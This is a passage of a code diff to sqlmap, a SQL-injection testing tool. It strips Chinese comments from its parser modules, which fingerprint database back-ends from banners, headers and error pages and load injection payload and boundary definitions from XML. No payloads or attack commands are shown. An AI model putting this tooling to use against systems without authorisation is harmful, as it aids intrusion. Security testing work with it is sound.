-            self.counter += 1  # 增加处理行数计数
+            self.counter += 1
            try:
-                retVal = next(self.iter).rstrip()  # 获取下一行并去除末尾空白字符
+                retVal = next(self.iter).rstrip()
            except zipfile.error as ex:
                errMsg = "something appears to be wrong with "
                errMsg += "the file '%s' ('%s'). Please make " % (self.current, getSafeExString(ex))
                errMsg += "sure that you haven't made any changes to it"
                raise SqlmapInstallationException(errMsg)
-            except StopIteration:  # 当前文件处理完毕
-                self.adjust()  # 切换到下一个文件
+            except StopIteration:
+                self.adjust()
                retVal = next(self.iter).rstrip()
-            # 在多进程模式下,根据进程ID筛选要处理的行
            if not self.proc_count or self.counter % self.proc_count == self.proc_id:
                break
        return retVal

    def rewind(self):
-        """
-        重置迭代器到开始位置
-        允许重新遍历字典
-        """
-        self.index = 0  # 重置文件索引
-        self.adjust()  # 重新调整文件指针和迭代器
+        self.index = 0
+        self.adjust()
--- a/src/sqlmap-master/lib/parse/banner.py
+++ b/src/sqlmap-master/lib/parse/banner.py
@ -26,21 +26,13 @@ class MSSQLBannerHandler(ContentHandler):
    def __init__(self, banner, info):
        ContentHandler.__init__(self)

-        # 初始化banner
        self._banner = sanitizeStr(banner or "")
-        # 初始化是否在version标签中
        self._inVersion = False
-        # 初始化是否在servicepack标签中
        self._inServicePack = False
-        # 初始化release
        self._release = None
-        # 初始化version
        self._version = ""
-        # 初始化versionAlt
        self._versionAlt = None
-        # 初始化servicePack
        self._servicePack = ""
-        # 初始化info
        self._info = info

    def _feedInfo(self, key, value):
@ -52,53 +44,41 @@ class MSSQLBannerHandler(ContentHandler):
        self._info[key] = value

    def startElement(self, name, attrs):
-        # 如果标签名为signatures，则获取release属性
        if name == "signatures":
            self._release = sanitizeStr(attrs.get("release"))

-        # 如果标签名为version，则设置_inVersion为True
        elif name == "version":
            self._inVersion = True

-        # 如果标签名为servicepack，则设置_inServicePack为True
        elif name == "servicepack":
            self._inServicePack = True

    def characters(self, content):
-        # 如果在version标签中，则将content添加到_version中
        if self._inVersion:
            self._version += sanitizeStr(content)
-        # 如果在servicepack标签中，则将content添加到_servicePack中
        elif self._inServicePack:
            self._servicePack += sanitizeStr(content)

    def endElement(self, name):
-        # 如果标签名为signature，则进行匹配
        if name == "signature":
            for version in (self._version, self._versionAlt):
-                # 如果version不为空，且banner不为空，且banner中包含version，则将release、version、servicePack添加到info中
                if version and self._banner and re.search(r" %s[\.\ ]+" % re.escape(version), self._banner):
                    self._feedInfo("dbmsRelease", self._release)
                    self._feedInfo("dbmsVersion", self._version)
                    self._feedInfo("dbmsServicePack", self._servicePack)
                    break

-            # 重置version、versionAlt、servicePack
            self._version = ""
            self._versionAlt = None
            self._servicePack = ""

-        # 如果标签名为version，则将_version中的空格去除，并尝试匹配
        elif name == "version":
            self._inVersion = False
            self._version = self._version.replace(" ", "")

-            # 尝试匹配
            match = re.search(r"\A(?P<major>\d+)\.00\.(?P<build>\d+)\Z", self._version)
-            # 如果匹配成功，则将versionAlt设置为"%s.0.%s.0" % (match.group('major'), match.group('build'))
            self._versionAlt = "%s.0.%s.0" % (match.group('major'), match.group('build')) if match else None

-        # 如果标签名为servicepack，则将_servicePack中的空格去除
        elif name == "servicepack":
            self._inServicePack = False
            self._servicePack = self._servicePack.replace(" ", "")
@ -111,31 +91,24 @@ def bannerParser(banner):

    xmlfile = None

-    # 如果数据库类型为MSSQL，则设置xmlfile为paths.MSSQL_XML
    if Backend.isDbms(DBMS.MSSQL):
        xmlfile = paths.MSSQL_XML
-    # 如果数据库类型为MYSQL，则设置xmlfile为paths.MYSQL_XML
    elif Backend.isDbms(DBMS.MYSQL):
        xmlfile = paths.MYSQL_XML
-    # 如果数据库类型为ORACLE，则设置xmlfile为paths.ORACLE_XML
    elif Backend.isDbms(DBMS.ORACLE):
        xmlfile = paths.ORACLE_XML
-    # 如果数据库类型为PGSQL，则设置xmlfile为paths.PGSQL_XML
    elif Backend.isDbms(DBMS.PGSQL):
        xmlfile = paths.PGSQL_XML

-    # 如果xmlfile为空，则返回
    if not xmlfile:
        return

-    # 如果数据库类型为MSSQL，则使用MSSQLBannerHandler解析xmlfile，并使用FingerprintHandler解析paths.GENERIC_XML
    if Backend.isDbms(DBMS.MSSQL):
        handler = MSSQLBannerHandler(banner, kb.bannerFp)
        parseXmlFile(xmlfile, handler)

        handler = FingerprintHandler(banner, kb.bannerFp)
        parseXmlFile(paths.GENERIC_XML, handler)
-    # 否则，使用FingerprintHandler解析xmlfile和paths.GENERIC_XML
    else:
        handler = FingerprintHandler(banner, kb.bannerFp)
        parseXmlFile(xmlfile, handler)
--- a/src/sqlmap-master/lib/parse/cmdline.py
+++ b/src/sqlmap-master/lib/parse/cmdline.py
@ -13,51 +13,40 @@ import shlex
 import sys

 try:
-    # 从optparse模块中导入OptionError、OptionGroup、OptionParser和SUPPRESS_HELP
    from optparse import OptionError as ArgumentError
    from optparse import OptionGroup
    from optparse import OptionParser as ArgumentParser
    from optparse import SUPPRESS_HELP as SUPPRESS

-    # 将ArgumentParser的add_argument方法替换为add_option方法
    ArgumentParser.add_argument = ArgumentParser.add_option

-    # 定义一个_add_argument_group方法，用于添加参数组
    def _add_argument_group(self, *args, **kwargs):
        return self.add_option_group(OptionGroup(self, *args, **kwargs))

-    # 将ArgumentParser的add_argument_group方法替换为_add_argument_group方法
    ArgumentParser.add_argument_group = _add_argument_group

-    # 定义一个_add_argument方法，用于添加参数
    def _add_argument(self, *args, **kwargs):
        return self.add_option(*args, **kwargs)

-    # 将OptionGroup的add_argument方法替换为_add_argument方法
    OptionGroup.add_argument = _add_argument

 except ImportError:
-    # 如果导入optparse模块失败，则从argparse模块中导入ArgumentParser、ArgumentError和SUPPRESS
    from argparse import ArgumentParser
    from argparse import ArgumentError
    from argparse import SUPPRESS

 finally:
-    # 定义一个get_actions方法，用于获取所有参数
    def get_actions(instance):
        for attr in ("option_list", "_group_actions", "_actions"):
            if hasattr(instance, attr):
                return getattr(instance, attr)

-    # 定义一个get_groups方法，用于获取所有参数组
    def get_groups(parser):
        return getattr(parser, "option_groups", None) or getattr(parser, "_action_groups")

-    # 定义一个get_all_options方法，用于获取所有参数和参数组中的参数
    def get_all_options(parser):
        retVal = set()

-        # 遍历所有参数
        for option in get_actions(parser):
            if hasattr(option, "option_strings"):
                retVal.update(option.option_strings)
@ -65,7 +54,6 @@ finally:
                retVal.update(option._long_opts)
                retVal.update(option._short_opts)

-        # 遍历所有参数组中的参数
        for group in get_groups(parser):
            for option in get_actions(group):
                if hasattr(option, "option_strings"):
--- a/src/sqlmap-master/lib/parse/configfile.py
+++ b/src/sqlmap-master/lib/parse/configfile.py
@ -5,58 +5,48 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

-# 导入所需的模块和函数
-from lib.core.common import checkFile  # 检查文件是否存在和可访问
-from lib.core.common import getSafeExString  # 安全地获取异常的字符串表示
-from lib.core.common import openFile  # 打开文件的工具函数
-from lib.core.common import unArrayizeValue  # 将数组值转换为单个值
-from lib.core.common import UnicodeRawConfigParser  # 处理Unicode的配置文件解析器
-from lib.core.convert import getUnicode  # 将输入转换为Unicode字符串
-from lib.core.data import cmdLineOptions  # 命令行选项存储
-from lib.core.data import conf  # 全局配置字典
-from lib.core.data import logger  # 日志记录器
-from lib.core.enums import OPTION_TYPE  # 选项类型枚举
-from lib.core.exception import SqlmapMissingMandatoryOptionException  # 缺少必需选项异常
-from lib.core.exception import SqlmapSyntaxException  # 语法错误异常
-from lib.core.optiondict import optDict  # 选项字典
-
-# 全局配置解析器对象
+from lib.core.common import checkFile
+from lib.core.common import getSafeExString
+from lib.core.common import openFile
+from lib.core.common import unArrayizeValue
+from lib.core.common import UnicodeRawConfigParser
+from lib.core.convert import getUnicode
+from lib.core.data import cmdLineOptions
+from lib.core.data import conf
+from lib.core.data import logger
+from lib.core.enums import OPTION_TYPE
+from lib.core.exception import SqlmapMissingMandatoryOptionException
+from lib.core.exception import SqlmapSyntaxException
+from lib.core.optiondict import optDict
+
 config = None

 def configFileProxy(section, option, datatype):
    """
-    解析配置文件并将设置保存到高级配置字典中。
-    
-    参数:
-        section: 配置文件中的节名
-        option: 选项名
-        datatype: 数据类型
+    Parse configuration file and save settings into the configuration
+    advanced dictionary.
    """

-    if config.has_option(section, option):  # 检查配置中是否存在该选项
+    if config.has_option(section, option):
        try:
-            # 根据数据类型获取相应的值
-            if datatype == OPTION_TYPE.BOOLEAN:  # 布尔类型
+            if datatype == OPTION_TYPE.BOOLEAN:
                value = config.getboolean(section, option) if config.get(section, option) else False
-            elif datatype == OPTION_TYPE.INTEGER:  # 整数类型
+            elif datatype == OPTION_TYPE.INTEGER:
                value = config.getint(section, option) if config.get(section, option) else 0
-            elif datatype == OPTION_TYPE.FLOAT:  # 浮点数类型
+            elif datatype == OPTION_TYPE.FLOAT:
                value = config.getfloat(section, option) if config.get(section, option) else 0.0
-            else:  # 字符串类型
+            else:
                value = config.get(section, option)
        except ValueError as ex:
-            # 如果值转换失败，抛出语法错误异常
            errMsg = "error occurred while processing the option "
            errMsg += "'%s' in provided configuration file ('%s')" % (option, getUnicode(ex))
            raise SqlmapSyntaxException(errMsg)

-        # 将值存储到全局配置字典中
        if value:
            conf[option] = value
        else:
            conf[option] = None
    else:
-        # 如果选项不存在，记录调试信息
        debugMsg = "missing requested option '%s' (section " % option
        debugMsg += "'%s') into the configuration file, " % section
        debugMsg += "ignoring. Skipping to next."
@ -64,55 +54,44 @@ def configFileProxy(section, option, datatype):

 def configFileParser(configFile):
    """
-    解析配置文件的主函数。
-    
-    参数:
-        configFile: 配置文件路径
+    Parse configuration file and save settings into the configuration
+    advanced dictionary.
    """

    global config

-    # 记录开始解析的调试信息
    debugMsg = "parsing configuration file"
    logger.debug(debugMsg)

-    # 检查配置文件是否存在和可访问
    checkFile(configFile)
    configFP = openFile(configFile, "rb")

    try:
-        # 创建配置解析器实例并读取配置文件
        config = UnicodeRawConfigParser()
-        if hasattr(config, "read_file"):  # Python 3
+        if hasattr(config, "read_file"):
            config.read_file(configFP)
-        else:  # Python 2
+        else:
            config.readfp(configFP)
    except Exception as ex:
-        # 如果解析失败，抛出语法错误异常
        errMsg = "you have provided an invalid and/or unreadable configuration file ('%s')" % getSafeExString(ex)
        raise SqlmapSyntaxException(errMsg)

-    # 检查是否存在必需的Target节
    if not config.has_section("Target"):
        errMsg = "missing a mandatory section 'Target' in the configuration file"
        raise SqlmapMissingMandatoryOptionException(errMsg)

-    # 检查必需选项
    mandatory = False

-    # 检查Target节中是否至少存在一个必需的选项
    for option in ("direct", "url", "logFile", "bulkFile", "googleDork", "requestFile", "wizard"):
        if config.has_option("Target", option) and config.get("Target", option) or cmdLineOptions.get(option):
            mandatory = True
            break

-    # 如果没有找到任何必需选项，抛出异常
    if not mandatory:
        errMsg = "missing a mandatory option in the configuration file "
        errMsg += "(direct, url, logFile, bulkFile, googleDork, requestFile or wizard)"
        raise SqlmapMissingMandatoryOptionException(errMsg)

-    # 遍历所有选项并解析它们
    for family, optionData in optDict.items():
        for option, datatype in optionData.items():
            datatype = unArrayizeValue(datatype)
--- a/src/sqlmap-master/lib/parse/handler.py
+++ b/src/sqlmap-master/lib/parse/handler.py
@ -13,95 +13,66 @@ from lib.core.common import sanitizeStr

 class FingerprintHandler(ContentHandler):
    """
-    这个类定义了解析和提取数据库管理系统(DBMS)横幅信息的方法
-    基于XML文件中的数据进行匹配和提取
+    This class defines methods to parse and extract information from
+    the given DBMS banner based upon the data in XML file
    """

    def __init__(self, banner, info):
-        """
-        初始化方法
-        :param banner: DBMS的横幅信息字符串
-        :param info: 用于存储提取信息的字典
-        """
        ContentHandler.__init__(self)

-        self._banner = sanitizeStr(banner or "")  # 清理并存储横幅信息
-        self._regexp = None      # 存储当前正则表达式
-        self._match = None       # 存储正则匹配结果
-        self._dbmsVersion = None # 存储数据库版本信息
-        self._techVersion = None # 存储技术版本信息
-        self._info = info        # 存储所有提取的信息
+        self._banner = sanitizeStr(banner or "")
+        self._regexp = None
+        self._match = None
+        self._dbmsVersion = None
+        self._techVersion = None
+        self._info = info

    def _feedInfo(self, key, value):
-        """
-        将提取的信息存入info字典
-        :param key: 信息类型(键)
-        :param value: 信息内容(值)
-        """
-        value = sanitizeStr(value)  # 清理输入值
-
-        # 如果值为空则直接返回
+        value = sanitizeStr(value)
+
        if value in (None, "None", ""):
            return

-        # 特殊处理数据库版本信息
        if key == "dbmsVersion":
            self._info[key] = value
        else:
-            # 对于其他类型的信息,创建一个集合来存储
            if key not in self._info:
                self._info[key] = set()

-            # 处理可能包含多个值的情况(用|分隔)
            for _ in value.split("|"):
                self._info[key].add(_)

    def startElement(self, name, attrs):
-        """
-        处理XML元素开始标签
-        :param name: 元素名称
-        :param attrs: 元素属性字典
-        """
-        # 处理regexp标签,用于匹配横幅信息
        if name == "regexp":
            self._regexp = sanitizeStr(attrs.get("value"))
-            # 优化技巧:通过快速检查避免编译大量正则表达式
-            _ = re.match(r"\A[A-Za-z0-9]+", self._regexp)  
+            _ = re.match(r"\A[A-Za-z0-9]+", self._regexp)  # minor trick avoiding compiling of large amount of regexes

-            # 如果快速检查通过或无法快速检查,则进行完整的正则匹配
            if _ and self._banner and _.group(0).lower() in self._banner.lower() or not _:
                self._match = re.search(self._regexp, self._banner, re.I | re.M)
            else:
                self._match = None

-        # 处理info标签,提取各种版本和技术信息
        if name == "info" and self._match:
-            # 提取基本信息
-            self._feedInfo("type", attrs.get("type"))         # 类型信息
-            self._feedInfo("distrib", attrs.get("distrib"))   # 发行版信息
-            self._feedInfo("release", attrs.get("release"))   # 发布信息
-            self._feedInfo("codename", attrs.get("codename")) # 代号信息
+            self._feedInfo("type", attrs.get("type"))
+            self._feedInfo("distrib", attrs.get("distrib"))
+            self._feedInfo("release", attrs.get("release"))
+            self._feedInfo("codename", attrs.get("codename"))

-            # 获取版本相关信息
            self._dbmsVersion = sanitizeStr(attrs.get("dbms_version"))
            self._techVersion = sanitizeStr(attrs.get("tech_version"))
            self._sp = sanitizeStr(attrs.get("sp"))

-            # 处理数据库版本信息
            if self._dbmsVersion and self._dbmsVersion.isdigit():
                self._feedInfo("dbmsVersion", self._match.group(int(self._dbmsVersion)))

-            # 处理技术版本信息
            if self._techVersion and self._techVersion.isdigit():
                self._feedInfo("technology", "%s %s" % (attrs.get("technology"), self._match.group(int(self._techVersion))))
            else:
                self._feedInfo("technology", attrs.get("technology"))

-            # 处理Service Pack信息
            if self._sp.isdigit():
                self._feedInfo("sp", "Service Pack %s" % int(self._sp))

-            # 重置所有临时变量
            self._regexp = None
            self._match = None
            self._dbmsVersion = None
--- a/src/sqlmap-master/lib/parse/headers.py
+++ b/src/sqlmap-master/lib/parse/headers.py
@ -5,53 +5,33 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

-# 导入操作系统相关的功能模块
 import os

-# 从lib.core.common导入XML文件解析函数
 from lib.core.common import parseXmlFile
-# 从lib.core.data导入全局变量存储对象kb和路径配置对象paths
 from lib.core.data import kb
 from lib.core.data import paths
-# 导入指纹识别处理器类
 from lib.parse.handler import FingerprintHandler

 def headersParser(headers):
    """
-    此函数通过解析HTTP请求头来识别:
-    1. 后端数据库管理系统
-    2. 操作系统类型
-    3. Web应用技术栈
-    参数headers: HTTP请求头字典
+    This function calls a class that parses the input HTTP headers to
+    fingerprint the back-end database management system operating system
+    and the web application technology
    """

-    # 如果全局变量中还没有初始化headerPaths
    if not kb.headerPaths:
-        # 初始化一个字典,存储不同HTTP头对应的XML规则文件路径
        kb.headerPaths = {
-            # SharePoint服务器特征识别规则
            "microsoftsharepointteamservices": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "sharepoint.xml"),
-            # 服务器类型识别规则
            "server": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "server.xml"),
-            # Java Servlet容器识别规则
            "servlet-engine": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "servlet-engine.xml"),
-            # Cookie特征识别规则
            "set-cookie": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "set-cookie.xml"),
-            # ASP.NET版本识别规则
            "x-aspnet-version": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-aspnet-version.xml"),
-            # 服务端技术栈识别规则
            "x-powered-by": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-powered-by.xml"),
        }

-    # 遍历HTTP头,将头名称转为小写并检查是否在规则文件字典中
    for header in (_.lower() for _ in headers if _.lower() in kb.headerPaths):
-        # 获取该HTTP头的值
        value = headers[header]
-        # 获取对应的XML规则文件路径
        xmlfile = kb.headerPaths[header]
-        # 创建一个指纹识别处理器实例
        handler = FingerprintHandler(value, kb.headersFp)
-        # 解析特定规则文件
        parseXmlFile(xmlfile, handler)
-        # 解析通用规则文件
        parseXmlFile(paths.GENERIC_XML, handler)
--- a/src/sqlmap-master/lib/parse/html.py
+++ b/src/sqlmap-master/lib/parse/html.py
@ -5,74 +5,64 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

-# 导入所需的模块
-import re  # 用于正则表达式处理
+import re

-from xml.sax.handler import ContentHandler  # XML内容处理器
+from xml.sax.handler import ContentHandler

-from lib.core.common import urldecode  # URL解码函数
-from lib.core.common import parseXmlFile  # XML文件解析函数
-from lib.core.data import kb  # 知识库,存储全局变量
-from lib.core.data import paths  # 路径相关配置
-from lib.core.settings import HEURISTIC_PAGE_SIZE_THRESHOLD  # 页面大小阈值设置
-from lib.core.threads import getCurrentThreadData  # 获取当前线程数据
+from lib.core.common import urldecode
+from lib.core.common import parseXmlFile
+from lib.core.data import kb
+from lib.core.data import paths
+from lib.core.settings import HEURISTIC_PAGE_SIZE_THRESHOLD
+from lib.core.threads import getCurrentThreadData

 class HTMLHandler(ContentHandler):
    """
-    这个类定义了解析HTML页面的方法,用于识别后端数据库管理系统的指纹
+    This class defines methods to parse the input HTML page to
+    fingerprint the back-end database management system
    """

    def __init__(self, page):
-        # 初始化父类
        ContentHandler.__init__(self)

-        self._dbms = None  # 存储数据库类型
-        self._page = (page or "")  # 存储页面内容
+        self._dbms = None
+        self._page = (page or "")
        try:
-            self._lower_page = self._page.lower()  # 将页面转换为小写
-        except SystemError:  # 处理Python bug: https://bugs.python.org/issue18183
+            self._lower_page = self._page.lower()
+        except SystemError:  # https://bugs.python.org/issue18183
            self._lower_page = None
-        self._urldecoded_page = urldecode(self._page)  # URL解码后的页面内容
+        self._urldecoded_page = urldecode(self._page)

-        self.dbms = None  # 最终识别出的数据库类型
+        self.dbms = None

    def _markAsErrorPage(self):
-        """标记当前页面为错误页面"""
        threadData = getCurrentThreadData()
        threadData.lastErrorPage = (threadData.lastRequestUID, self._page)

    def startElement(self, name, attrs):
-        """
-        处理XML元素开始标签
-        name: 标签名
-        attrs: 标签属性
-        """
-        if self.dbms:  # 如果已经识别出数据库类型,直接返回
+        if self.dbms:
            return

-        if name == "dbms":  # 如果是数据库标签
+        if name == "dbms":
            self._dbms = attrs.get("value")

-        elif name == "error":  # 如果是错误标签
+        elif name == "error":
            regexp = attrs.get("regexp")
            if regexp not in kb.cache.regex:
-                # 提取正则表达式中的关键词
                keywords = re.findall(r"\w+", re.sub(r"\\.", " ", regexp))
                keywords = sorted(keywords, key=len)
                kb.cache.regex[regexp] = keywords[-1].lower()

-            # 检查页面是否匹配错误模式
            if ('|' in regexp or kb.cache.regex[regexp] in (self._lower_page or kb.cache.regex[regexp])) and re.search(regexp, self._urldecoded_page, re.I):
-                self.dbms = self._dbms  # 设置识别出的数据库类型
-                self._markAsErrorPage()  # 标记为错误页面
-                kb.forkNote = kb.forkNote or attrs.get("fork")  # 设置fork注释
+                self.dbms = self._dbms
+                self._markAsErrorPage()
+                kb.forkNote = kb.forkNote or attrs.get("fork")

 def htmlParser(page):
    """
-    解析HTML页面以识别后端数据库类型的主函数
-    page: 要解析的HTML页面内容
-    
-    示例:
+    This function calls a class that parses the input HTML page to
+    fingerprint the back-end database management system
+
    >>> from lib.core.enums import DBMS
    >>> htmlParser("Warning: mysql_fetch_array() expects parameter 1 to be resource") == DBMS.MYSQL
    True
@ -80,32 +70,30 @@ def htmlParser(page):
    >>> threadData.lastErrorPage = None
    """

-    page = page[:HEURISTIC_PAGE_SIZE_THRESHOLD]  # 截取页面内容到阈值大小
+    page = page[:HEURISTIC_PAGE_SIZE_THRESHOLD]

-    xmlfile = paths.ERRORS_XML  # 错误模式的XML配置文件
-    handler = HTMLHandler(page)  # 创建处理器实例
-    key = hash(page)  # 计算页面内容的哈希值
+    xmlfile = paths.ERRORS_XML
+    handler = HTMLHandler(page)
+    key = hash(page)

-    # 检查通用SQL警告/错误信息
+    # generic SQL warning/error messages
    if re.search(r"SQL (warning|error|syntax)", page, re.I):
        handler._markAsErrorPage()

-    # 如果页面已经解析过,直接返回缓存的结果
    if key in kb.cache.parsedDbms:
        retVal = kb.cache.parsedDbms[key]
        if retVal:
            handler._markAsErrorPage()
        return retVal

-    parseXmlFile(xmlfile, handler)  # 解析XML配置文件
+    parseXmlFile(xmlfile, handler)

-    # 更新识别状态
    if handler.dbms and handler.dbms not in kb.htmlFp:
        kb.lastParserStatus = handler.dbms
        kb.htmlFp.append(handler.dbms)
    else:
        kb.lastParserStatus = None

-    kb.cache.parsedDbms[key] = handler.dbms  # 缓存解析结果
+    kb.cache.parsedDbms[key] = handler.dbms

-    return handler.dbms  # 返回识别出的数据库类型
+    return handler.dbms
--- a/src/sqlmap-master/lib/parse/payloads.py
+++ b/src/sqlmap-master/lib/parse/payloads.py
@ -5,13 +5,11 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

-# 导入所需的标准库
 import os
 import re

-from xml.etree import ElementTree as et  # 导入XML解析库
+from xml.etree import ElementTree as et

-# 导入自定义模块和函数
 from lib.core.common import getSafeExString
 from lib.core.compat import xrange
 from lib.core.data import conf
@ -21,48 +19,31 @@ from lib.core.exception import SqlmapInstallationException
 from lib.core.settings import PAYLOAD_XML_FILES

 def cleanupVals(text, tag):
-    """
-    清理和转换XML中的值
-    :param text: 需要处理的文本
-    :param tag: XML标签名
-    :return: 处理后的值
-    """
-    # 处理clause标签中的范围表示法(如"1-3"转换为"1,2,3")
    if tag == "clause" and '-' in text:
        text = re.sub(r"(\d+)-(\d+)", lambda match: ','.join(str(_) for _ in xrange(int(match.group(1)), int(match.group(2)) + 1)), text)

-    # 对clause和where标签的内容按逗号分割
    if tag in ("clause", "where"):
        text = text.split(',')

-    # 如果文本是纯数字，转换为整数
    if hasattr(text, "isdigit") and text.isdigit():
        text = int(text)

-    # 处理列表类型的值
    elif isinstance(text, list):
        count = 0
-        # 遍历列表，将数字字符串转换为整数
+
        for _ in text:
            text[count] = int(_) if _.isdigit() else _
            count += 1

-        # 如果列表只有一个元素且不是特定标签，则返回该元素
        if len(text) == 1 and tag not in ("clause", "where"):
            text = text[0]

    return text

 def parseXmlNode(node):
-    """
-    解析XML节点
-    :param node: XML节点对象
-    """
-    # 解析boundary(边界)节点
    for element in node.findall("boundary"):
-        boundary = AttribDict()  # 创建一个属性字典
+        boundary = AttribDict()

-        # 遍历boundary的子节点
        for child in element:
            if child.text:
                values = cleanupVals(child.text, child.tag)
@ -72,24 +53,20 @@ def parseXmlNode(node):

        conf.boundaries.append(boundary)

-    # 解析test(测试)节点
    for element in node.findall("test"):
-        test = AttribDict()  # 创建一个属性字典
+        test = AttribDict()

-        # 遍历test的子节点
        for child in element:
            if child.text and child.text.strip():
                values = cleanupVals(child.text, child.tag)
                test[child.tag] = values
            else:
-                # 处理没有子元素的节点
                if len(child.findall("*")) == 0:
                    test[child.tag] = None
                    continue
                else:
                    test[child.tag] = AttribDict()

-                # 处理有子元素的节点
                for gchild in child:
                    if gchild.tag in test[child.tag]:
                        prevtext = test[child.tag][gchild.tag]
@ -101,18 +78,17 @@ def parseXmlNode(node):

 def loadBoundaries():
    """
-    从XML文件加载边界定义
-    
+    Loads boundaries from XML
+
    >>> conf.boundaries = []
    >>> loadBoundaries()
    >>> len(conf.boundaries) > 0
    True
    """
+
    try:
-        # 尝试解析boundaries.xml文件
        doc = et.parse(paths.BOUNDARIES_XML)
    except Exception as ex:
-        # 如果解析失败，抛出安装异常
        errMsg = "something appears to be wrong with "
        errMsg += "the file '%s' ('%s'). Please make " % (paths.BOUNDARIES_XML, getSafeExString(ex))
        errMsg += "sure that you haven't made any changes to it"
@ -123,22 +99,20 @@ def loadBoundaries():

 def loadPayloads():
    """
-    从XML文件加载有效载荷/测试用例
-    
+    Loads payloads/tests from XML
+
    >>> conf.tests = []
    >>> loadPayloads()
    >>> len(conf.tests) > 0
    True
    """
-    # 遍历所有payload XML文件
+
    for payloadFile in PAYLOAD_XML_FILES:
        payloadFilePath = os.path.join(paths.SQLMAP_XML_PAYLOADS_PATH, payloadFile)

        try:
-            # 尝试解析payload XML文件
            doc = et.parse(payloadFilePath)
        except Exception as ex:
-            # 如果解析失败，抛出安装异常
            errMsg = "something appears to be wrong with "
            errMsg += "the file '%s' ('%s'). Please make " % (payloadFilePath, getSafeExString(ex))
            errMsg += "sure that you haven't made any changes to it"
--- a/src/sqlmap-master/lib/parse/sitemap.py
+++ b/src/sqlmap-master/lib/parse/sitemap.py
@ -5,79 +5,52 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

-# 导入正则表达式模块,用于匹配和提取文本
 import re

-# 导入所需的功能模块
-from lib.core.common import readInput  # 用于读取用户输入的函数
-from lib.core.data import kb  # 知识库(knowledge base),存储全局变量和配置信息
-from lib.core.data import logger  # 日志记录器,用于记录程序运行信息
-from lib.core.datatype import OrderedSet  # 有序集合数据类型,可以保持元素插入顺序
-from lib.core.exception import SqlmapSyntaxException  # SQL注入工具的语法异常类
-from lib.request.connect import Connect as Request  # HTTP请求处理类,用于发送网络请求
-from thirdparty.six.moves import http_client as _http_client  # HTTP客户端,用于处理HTTP连接
+from lib.core.common import readInput
+from lib.core.data import kb
+from lib.core.data import logger
+from lib.core.datatype import OrderedSet
+from lib.core.exception import SqlmapSyntaxException
+from lib.request.connect import Connect as Request
+from thirdparty.six.moves import http_client as _http_client

-# 定义全局中止标志,用于控制程序终止
 abortedFlag = None

 def parseSitemap(url, retVal=None):
-    """
-    解析网站地图(sitemap)的函数
-    
-    参数说明:
-        url: 网站地图的URL地址,即要解析的sitemap文件地址
-        retVal: 存储解析结果的集合,默认为None。如果为None会创建新的集合
-    
-    返回值:
-        OrderedSet类型,包含从sitemap中提取的所有URL地址
-    """
-    global abortedFlag  # 声明使用全局中止标志变量
+    global abortedFlag

-    # 如果retVal不为空,说明是递归调用,记录开始解析新sitemap的日志
    if retVal is not None:
        logger.debug("parsing sitemap '%s'" % url)

    try:
-        # 如果retVal为空,说明是首次调用,初始化返回值集合和中止标志
        if retVal is None:
-            abortedFlag = False  # 重置中止标志为False
-            retVal = OrderedSet()  # 创建一个新的有序集合用于存储URL
+            abortedFlag = False
+            retVal = OrderedSet()

        try:
-            # 发送HTTP请求获取网站地图内容
-            # raise404=True表示如果页面不存在(404错误)会抛出异常
-            # 如果已经设置中止标志,则返回空字符串
            content = Request.getPage(url=url, raise404=True)[0] if not abortedFlag else ""
        except _http_client.InvalidURL:
-            # 如果提供的URL格式无效,抛出语法异常
            errMsg = "invalid URL given for sitemap ('%s')" % url
            raise SqlmapSyntaxException(errMsg)

-        # 使用正则表达式查找sitemap中所有<loc>标签内的URL
-        # <loc>标签是sitemap格式中用于存放URL的标准标签
        for match in re.finditer(r"<loc>\s*([^<]+)", content or ""):
-            if abortedFlag:  # 如果收到中止信号,立即退出循环
+            if abortedFlag:
                break
-            url = match.group(1).strip()  # 提取URL并去除首尾空白字符
-            
-            # 判断是否为子sitemap文件
-            # sitemap文件通常以.xml结尾,且URL中包含"sitemap"字样
+            url = match.group(1).strip()
            if url.endswith(".xml") and "sitemap" in url.lower():
-                # 首次遇到子sitemap时询问用户是否要递归处理
                if kb.followSitemapRecursion is None:
                    message = "sitemap recursion detected. Do you want to follow? [y/N] "
                    kb.followSitemapRecursion = readInput(message, default='N', boolean=True)
-                # 如果用户同意递归处理,则解析子sitemap
                if kb.followSitemapRecursion:
-                    parseSitemap(url, retVal)  # 递归调用解析函数
+                    parseSitemap(url, retVal)
            else:
-                retVal.add(url)  # 将找到的URL添加到结果集合中
+                retVal.add(url)

    except KeyboardInterrupt:
-        # 捕获键盘中断信号(用户按Ctrl+C)
-        abortedFlag = True  # 设置中止标志
+        abortedFlag = True
        warnMsg = "user aborted during sitemap parsing. sqlmap "
        warnMsg += "will use partial list"
-        logger.warning(warnMsg)  # 记录警告信息,提示将使用部分解析结果
+        logger.warning(warnMsg)

-    return retVal  # 返回收集到的所有URL集合
+    return retVal
--- a/src/sqlmap-master/lib/request/init.py
+++ b/src/sqlmap-master/lib/request/init.py
@ -0,0 +1,8 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
+See the file 'LICENSE' for copying permission
+"""
+
+pass
--- a/src/sqlmap-master/lib/request/basicauthhandler.py
+++ b/src/sqlmap-master/lib/request/basicauthhandler.py
@ -5,63 +5,34 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

-# 导入urllib库并重命名为_urllib
 from thirdparty.six.moves import urllib as _urllib

 class SmartHTTPBasicAuthHandler(_urllib.request.HTTPBasicAuthHandler):
    """
-    参考: http://selenic.com/hg/rev/6c51a5056020
-    修复Bug: http://bugs.python.org/issue8797
-    
